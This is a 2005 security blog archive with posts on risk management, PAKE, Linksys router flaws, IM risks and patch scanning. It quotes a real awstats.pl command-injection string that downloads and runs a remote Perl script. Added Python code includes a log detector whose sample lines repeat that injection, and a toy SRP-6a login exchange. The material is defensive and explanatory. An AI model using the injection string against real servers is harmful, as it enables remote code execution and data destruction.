General: September 2005 Archives
I just watched a Network World webcast titled IT without Compromise.
The webcast addressed some of the things I've been thinking about recently. As security complexity increases, as we try to do more on the wire, the cost of piecemeal security solutions goes up. It costs money to protect SMTP, HTTP, and IM. And these perimeter solutions don't protect the mobile workforce.
What is needed is an asset-oriented solution instead of a threat-oriented solution. Rather than buying into protecting against the threat that the trade mags are warning about, you need to look at what needs to be protected. Where are your business assets? Then you can look at what threats there are against those assets and what you have in place to protect them. What will happen if those assets are hit? That is a business impact analysis. It is an ongoing thing, because your assets change, threats change, and best practices change.
Security needs to be more holistic. Instead of selling fear, security is the great business enabler, and that is how it needs to be approached. Instead of being centered around threats and technology, security needs to be asset and business centered.
I hear that on the DVD for the first season of the U.S. version of The Office there is a password scene in the deleted cuts.
edit - I just found the scene on the NBC website.
Dwight - good.. excellent. and file sharing off and done...Security software, 128 bit encryption, firewalls. Get up I'll install it on your computer
Jim - No thanks
Dwight - Stupid. Identity theft happens all the time. I could become you, like that. But no one can become me.
Jim - no one wants to be you Dwight
Dwight - not true. and if they did, they couldn't, because I'm password protected
Jim - "Is your password 'Frodo'"?
Dwight - "No..." (he starts typing really fast on his computer)
Another short pause...
Jim - "Did you just change your password to 'Gollum'"?
Dwight - No
(more typing...)
Earthlink won a lawsuit brought by a bank incorrectly identified as a suspicious site by Earthlink's anti-phishing filter.
US District Judge John Shabaz last week ruled that Earthlink was not liable for using dicky data from a third party because of provisions in the 1996 Telecommunications Act. "Because the evidence indicates the information came from another provider, defendant cannot be held liable for the republication of the statements," he wrote.
With Microsoft adding an anti-phishing toolbar in IE7, I suspect we'll see similar lawsuits against them.
How many vulnerabilities does a "secure" browser need to have before people realize they were a bit hasty with the bandwagon jumping? I don't care how many Secunia graphs you use to defend your niche browser. I'm thinking more than a handful of vulnerabilities could be a sign.
SANS ISC highlighted awstats attacks today in the diary. I'm seeing the same sort of thing: scans looking for
awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20http://geocities.com/ventor_team/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo|
I think that is the 9-month-old awstats vulnerability. If you're running it you should patch it, and password protect the directory it is installed in.
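As an added example (not code from the ISC diary or from this post), here is a small Python detector that runs over web server access logs and flags awstats.pl requests whose configdir parameter carries shell metacharacters, which is the shape of the scan quoted above. The log lines are constructed for the demo; the IP addresses and the download host are placeholders.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed Apache combined-format log lines (not real traffic).  Line 2 mirrors
# the configdir injection shape seen in the wild; line 3 is the same idea with the
# pipe characters percent-encoded; lines 1 and 4 are legitimate awstats requests.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Sep/2005:10:01:12 -0400] "GET /cgi-bin/awstats.pl?config=site&output=main HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
198.51.100.9 - - [22/Sep/2005:10:02:40 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://example.invalid/a.txt;perl%20a.txt;echo| HTTP/1.0" 404 219 "-" "Mozilla/4.0"
198.51.100.9 - - [22/Sep/2005:10:02:41 -0400] "GET /cgi-bin/awstats.pl?configdir=%7Cid%7C HTTP/1.0" 404 219 "-" "libwww-perl/5.79"
192.0.2.7 - - [22/Sep/2005:10:03:05 -0400] "GET /stats/awstats.pl?configdir=/etc/awstats&config=site HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# Pull out client IP, timestamp, request path and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Characters that have no business in a directory name but drive the Perl open() pipe.
SHELL_META = re.compile(r'[|;`$&]')


def query_params(query):
    """Split a query string on '&' only and percent-decode each key and value.

    Done by hand rather than with parse_qs so that ';' inside an injected value
    is preserved (older Python versions treat ';' as a separator).
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def awstats_configdir_hits(log_text):
    """Return one record per awstats.pl request with a suspicious configdir value."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.endswith("awstats.pl"):
            continue
        for value in query_params(parts.query).get("configdir", []):
            if SHELL_META.search(value):
                hits.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "configdir": value,
                })
    return hits


if __name__ == "__main__":
    for hit in awstats_configdir_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} configdir={hit['configdir']!r}")
```

Note that a 404 does not mean you are safe: the scanner does not know where your copy lives, so a hit against /cgi-bin/ is still a reason to confirm your real awstats path is patched and password protected.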
Certification and Accreditation. Is it the path to security? Does it even purport to be that? I find myself asking that question as I review the site security plan we are putting together where I work. I'm all for best practices, but one best practice is not applicable everywhere. As Jesper Johansson has written, it is a myth that security checklists will protect you.
I liked what Richard Bejtlich said about this:
Millions of dollars and thousands of hours are spent on C&A, and C&A levels are used to assess security. In reality C&A is a 20-year-old paperwork exercise that does not yield improved security. The only real way to measure security is to track the numbers and types of compromise over time, and try to see that number decrease.
At the Gartner IT Security Summit in London, Ant Allan said that "passwords are no longer adequate, as threats against them increase."
He seems to advocate multi-factor authentication in spite of the expense of smartcards or SecurID.
In my Advanced Network Security course, the first project has to do with implementing a protocol called PAKE (password-authenticated key exchange). This was proposed last decade. It is a secure method of password authentication where the password is not sent over the wire. Rather, in a DH-like fashion the user is able to prove to the server that it knows the password, so an active attacker cannot gain an advantage by sniffing the logon. Also, the server does not even store the password in a format that is useful if the PDV is stolen. Any two-factor authentication should authenticate both the server and the client, and not be susceptible to man in the middle. This makes PAKE an interesting study, although I'm not sure how well it scales.
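To make the properties above concrete, here is an added Python walk-through of one PAKE, SRP-6a, written for this page rather than taken from the course or from any library. The group parameters are a toy choice (the Mersenne prime 2^127 - 1 with g = 3) so the numbers stay readable; a real deployment would use an RFC 5054 group. The server stores only a salt and a verifier v = g^x, the password never crosses the wire, and each side proves knowledge of the shared key before the other accepts it.

```python
import hashlib
import secrets

# Toy group parameters (illustration only): 2**127 - 1 is prime, which keeps the
# arithmetic readable.  A real deployment would use an RFC 5054 group.
N = 2**127 - 1
g = 3


def H(*parts):
    """Hash a mix of ints, strs and bytes to one integer with SHA-256."""
    h = hashlib.sha256()
    for p in parts:
        if isinstance(p, int):
            p = p.to_bytes((p.bit_length() + 7) // 8 or 1, "big")
        elif isinstance(p, str):
            p = p.encode()
        h.update(p)
    return int.from_bytes(h.digest(), "big")


k = H(N, g) % N  # SRP-6a multiplier, binds the verifier into B


def enroll(username, password):
    """Server-side enrollment: store a salted verifier v = g^x, never the password."""
    salt = secrets.token_bytes(16)
    x = H(salt, H(f"{username}:{password}"))
    return {"username": username, "salt": salt, "verifier": pow(g, x, N)}


def client_start():
    """Client picks an ephemeral a and sends A = g^a (this is all that leaves the client)."""
    a = secrets.randbelow(N - 2) + 1
    return a, pow(g, a, N)


def server_challenge(record, A):
    """Server answers with B = k*v + g^b; B alone leaks nothing usable about v."""
    if A % N == 0:  # reject the degenerate public value
        raise ValueError("invalid client public value")
    b = secrets.randbelow(N - 2) + 1
    B = (k * record["verifier"] + pow(g, b, N)) % N
    return b, B


def client_finish(username, password, salt, a, A, B):
    """Client derives the session key from its password and sends proof M1."""
    if B % N == 0:
        raise ValueError("invalid server public value")
    u = H(A, B)
    x = H(salt, H(f"{username}:{password}"))
    base = (B - k * pow(g, x, N)) % N  # equals g^b only if the client knows x
    S = pow(base, a + u * x, N)
    K = H(S)
    M1 = H(A, B, K)
    return K, M1


def server_finish(record, b, A, B, M1):
    """Server derives the same key from the verifier and checks the client's proof."""
    u = H(A, B)
    S = pow((A * pow(record["verifier"], u, N)) % N, b, N)
    K = H(S)
    if M1 != H(A, B, K):
        return None  # wrong password (or tampered exchange): reject
    return K, H(A, M1, K)  # M2 proves the server really held v


def login(username, password, record):
    """Run the whole exchange; only A, B, M1 and M2 would ever cross the wire."""
    a, A = client_start()
    b, B = server_challenge(record, A)
    K_client, M1 = client_finish(username, password, record["salt"], a, A, B)
    result = server_finish(record, b, A, B, M1)
    if result is None:
        return False
    K_server, M2 = result
    # The client authenticates the server by checking M2 against its own key.
    return M2 == H(A, M1, K_client) and K_client == K_server


if __name__ == "__main__":
    rec = enroll("alice", "correct horse battery staple")
    print("server stores salt", rec["salt"].hex(), "and verifier", hex(rec["verifier"])[:18] + "...")
    print("right password accepted:", login("alice", "correct horse battery staple", rec))
    print("wrong password accepted:", login("alice", "Tr0ub4dor&3", rec))
```

Two caveats a practitioner would want: the verifier record is still worth protecting, because an attacker who steals it can run an offline dictionary search against v even though it cannot be replayed as a password; and the per-login cost is a few modular exponentiations on each side, which is where the scaling question in the text comes from.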
http://software.silicon.com/security/0,39024655,39152300,00.htm
IT departments should not be calling the shots on security, according to Jay Heiser, research VP at Gartner Research. Instead, companies need to take a business-oriented, risk-management approach. Stepping back from technical details allows a company's IT practices to be forward-looking, aligned with the core business, and provide better return on investment. Zurich Financial Services halved its IT costs by outsourcing the commodity aspects of IT and security and focusing on policy rather than the technical aspects of the firewall. Heiser says that IT training is not enough anymore, but the job of managing IT risk requires a business school background majoring in risk management.
I would agree that risk management is an important part of computer security. You need to decide what is important. What it would cost if damaged. What it would cost to repair, what it would cost to protect. That is a business decision, not a techie decision. However, if you remove the decision from the IT department itself, or remove it from the CIO or CSO then there is a communications gulf that becomes difficult to cross.
It has always been the security tech's job to explain what the problem is, how it will affect business, and what it will cost to fix. Was I.T. training alone ever enough?
In the same vein, there is an article in SC Magazine that says the next generation of security experts will need to be as business savvy as they are technically knowledgeable: "take your best and brightest security people and teach them more about business rather than worrying about getting them CISSPs and CISMs."
Soft skills are essential. But that doesn't mean you can just take a suit and turn him into an Information Security professional. At the same time, unless you want to get relegated to the basement (like I.T. pre-2000) you need to have the interpersonal skills, you need to be able to explain security issues, you need to be able to communicate with your manager, your director and your CIO and relate why this is important.
As reported by iDefense, there are several problems in multiple versions of firmware for Linksys's WRT54G.
1. Authentication problem in setup page
2. Buffer overflow in apply.cgi allows attacker to take action as administrator
3. The restore.cgi portion of the webpage will take unauthenticated restore commands and restore them at next boot.
4. Unauthenticated upgrade of the firmware. An attacker could replace the firmware with their own code.
5. Input validation may allow denial of service of the device.
The quick workaround for this is to make sure that the Linksys administrator site on your router cannot be accessed over your wireless network.
• Connect to the web interface, typically at http://192.168.1.1/
• Go to the Administration page
• Select 'Disable' next to the 'Wireless Access Web'
• Click the 'Save Settings' button.
Of course a malicious attacker on your internal wired network could still get you, but theoretically you have more control over where you live than where your wireless signal may reach.
Recommended action: check the Linksys support site for an upgrade to your router firmware.
http://www.imlogic.com/news/press_119.asp
In a recent survey of 1,100 enterprise IM users, IMlogic found that most respondents unwittingly expose their computers and the company’s infrastructures to malicious attacks because of IM’s social nature: users believe they are protected because they only exchange instant messages with people they trust. Some of the survey’s key findings include:
78 percent perceive IM to be safer than e-mail, and not subject to any security threats or potential vulnerabilities;
63 percent would click on an unknown link because it came from someone on their buddy list, a perceived trusted source;
45 percent use IM at work because they believe their communication is unmonitored;
35 percent believe they have received a message containing a malicious link; and
29 percent regularly transfer files over IM.
I like stories like this that show planning, preparation and hard work paying off. A Wall Street Journal article (linked here in the Pittsburgh Post-Gazette) writes about the disaster response team that got Wal-Marts reopened across the Gulf Coast after they were hit by Katrina.
Wal-Mart's speed in responding to Katrina underscores the extent to which it and other big-box retailers like Home Depot Inc. have become key players in responding to natural disasters. Whereas FEMA has to scramble for resources, Bentonville, Ark.-based Wal-Mart has its own trucks, distribution centers and dozens of stores in most areas of the country. It also has a specific protocol for responding to disasters, and it can activate an emergency command center to coordinate an immediate response.
Sheriff Bob Buckley of Union Parish, La., has nothing but praise for Wal-Mart's role. About 600 law-enforcement officers from around the state gathered in Gonzalez to start rescue operations, he says, but they had no supplies. They called Wal-Mart the day after the hurricane hit and two days later, they got two truckloads of flashlights, batteries, meals ready to eat, protective gear and ammunition. And when did FEMA arrive? "Who?" Sheriff Buckley asks.
Today's Sharktank just sends a cold chill down my spine.
Mozillazine reports that plans are in the works to remove support for SSL version 2 from Firefox.
Anyone heard if IE7 will do likewise? SSL2 is old; if I remember right it is vulnerable to a man-in-the-middle attack.
This is old news, but I was on vacation when zotob, etc came out and I missed this.
Foundstone just released an MS05-039 scanner; see the Foundstone site for the direct download or for more info.
Unlike eEye's free scan tool for MS05-039, this one doesn't crash on you, it isn't limited to a small number of IP addresses (around 18), and it doesn't require a software install.
My favorite thing about the free Foundstone individual vulnerability scan tool is that you can create an import file with your IP ranges. That would be a huge job for me otherwise, since our remote site address space is rather disjunct. Check out the readme, and make sure to run this from a server so you get the fully threaded capability and aren't crippled by XP SP2's limit of 10 concurrent connections.
Although this is much after the fact, it's still important to catch up with who isn't patched. Sure, you probably have other tools, but I'm a fan of using tools like this to double-check the others.
Did you know that if you browse with Internet Explorer, a site could grab what's in your clipboard? This not-so-startling announcement was made in the ISC Diary.
My reaction? Welcome to 2004. No wait, make that 2002. Oh, no make that since IE 5 was released.
The article doesn't mention talking to the IE product team. I'm sure they have the contacts to do so if they wanted to.
The article doesn't mention any testing. They could have reported testing that although IE6 on XPsp2 still had the problem, IE7 by default does not. They could have described how to fix the problem in earlier versions of IE with a minor settings change. Perhaps even a way to push that out with Group Policy.
No doubt some people learned something new today because of the ISC post. That will be seen as good justification by most. To me it seemed like old news.